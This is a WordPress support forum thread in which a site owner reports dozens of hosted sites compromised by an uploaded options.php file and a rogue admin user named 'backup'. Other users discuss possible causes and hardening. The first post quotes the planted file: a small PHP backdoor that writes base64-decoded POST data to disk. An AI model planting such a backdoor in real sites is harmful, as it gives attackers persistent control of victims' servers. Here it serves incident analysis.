Dozens of WP Sites Hacked

  • I host around 200 WordPress sites for myself and a handful of clients. Today I noticed that a file named options.php had been uploaded to many of them, appearing in several places throughout each site’s directory structure.

    I have not found evidence of any other files being added yet, and I have not found a common link between the affected sites in terms of WP versions or plugins in use. A few of these sites were in beta with fresh installs of WP and little or no plugins!

    I’m wondering if the attacker may be using a new, unknown exploit. This is the content in each uploaded file:

    <?php
if (isset($_POST['da'])) {
file_put_contents('options.php', base64_decode($_POST['da']), LOCK_EX);
}
?>

    I’m going to do some more digging this morning and start cleaning things up. I’ve never encountered a crack like this, where several sites were affected. Don’t bother posting links to the WP hacking FAQ; I can fix this.

    I’m more interested in discovering the source of the exploit and whether or not it’s something new. If anyone has any input or has seen similar behavior this past week, please post.

Viewing 9 replies - 1 through 9 (of 9 total)
  • Moderator t-p

    (@t-p)

    carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    David_G

    (@questas_admin)

    Hopefully when you figure it out, you’ll post it here.

    Thread Starter C4talyst

    (@c4talyst)

    Tara, I mentioned that guide in my post. I posted here mainly due to concerns that this may be a new exploit within a plugin or the WP core.

    I’m more interested in discovering the source of the exploit and whether or not it’s something new

    You need to parser your server logs for hints at what happened. Is this your own server? A managed server with a webhost?

    Thread Starter C4talyst

    (@c4talyst)

    My server. I’ve been through the logs but I’m not running mod_security so the information is limited. I’m just now starting to go through all the sites. Several were running older WP versions and have some outdated plugins however, a few were running WP 4.3.1 with only a handful of up-to-date plugins in place. It looks like in each case, an admin user named ‘backup’ was also added.

    Several were running older WP versions and have some outdated plugins….

    Once they were in, they could traverse the database and add users to any site.

    Sounds like you need to learn server security; try https://serverfault.com

    Thread Starter C4talyst

    (@c4talyst)

    I don’t think the server was rooted through any of these attacks. Are you saying there are past WP or plugin exploits that allowed database users to be added to other sites?

    It’s generally pretty obvious to tell when a server has been rooted, especially if the attackers are using it for anything (usually spam).

    In the case of this attack, these sites all received the uploaded file I mentioned, and the added user (and nothing else) on the morning of October 10. I think these sites were all hit individually using an automated tool.

    “Traversing” the database makes no sense…the attackers would be limited to using the one account they had access to, if they could read wp-config.php.

    Thread Starter C4talyst

    (@c4talyst)

    Also, how would a few outdated cores and plugins on other sites explain the files showing up on brand-new 4.3.1 sites running no plugins?

    David_G

    (@questas_admin)

    I use BulletProof Security Pro on all my sites. Since installing it no one has managed to hack them, add users or files, or access the DB. It’s a very good plugin with excellent support. THere is a free version also. Any time a file that isn’t already on the site is added, it get’s quarantined immediately, then I have the option to keep it or delete it. You can white list certain folders like the child theme so it isn’t affected. But this plugin is the best in my book.

Viewing 9 replies - 1 through 9 (of 9 total)
  • The topic ‘Dozens of WP Sites Hacked’ is closed to new replies.

Tags